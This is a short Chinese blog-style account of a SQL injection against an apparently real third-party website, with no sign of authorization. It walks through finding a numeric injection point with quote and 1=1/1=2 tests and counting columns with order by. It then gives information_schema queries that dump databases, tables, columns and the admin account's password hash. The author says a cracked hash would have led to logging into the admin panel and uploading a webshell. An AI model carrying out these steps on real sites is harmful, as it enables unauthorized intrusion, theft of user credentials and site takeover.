一次简单SQL注入
id大法 遇见id= 上去一个单引号 报错,
回显判断是MySQL数据库 and 1=1正常 and 1=2 不正常
数字型注入点没错了,还没有WAF 开始下手
order by 判断当前注入点有25个字段 回显 2 和 10
用database()替换2 version()替换10 开始爆当前数据库和版本
得到当前数据库跟版本,替换查询语句开始查询所有数据库 查询到只有两个库
SELECT group_concat(schema_name) from information_schema.schemata
开始爆当前数据库所有表名
SELECT group_concat(table_name) from information_schema.tables where table_schema='库名'
注意:库名跟表名都需要16进制加密
一眼望过去只有user表入我的法眼 开始爆user表里所有字段
SELECT group_concat(column_name) from information_schema.columns where table_name='表名'
开始爆字段内容
select group_concat(column_name) from information_schema.columns where table_name=表名
这里精简为:select group_concat(字段) from user
账户admin出来了 开始爆密码(替换name字段就行)
这里的admin和这段加密的密码很有可能是后台的账户
在此之前已经通过扫描器找到了他的后台
但是这段哈希值是密码为程序员自定义的哈希加密,
破解非常非常麻烦(需撞库)所以到此就结束了
如果这里密码能解密应该就能直接登录后台进行下一步渗透 上传拿webshell等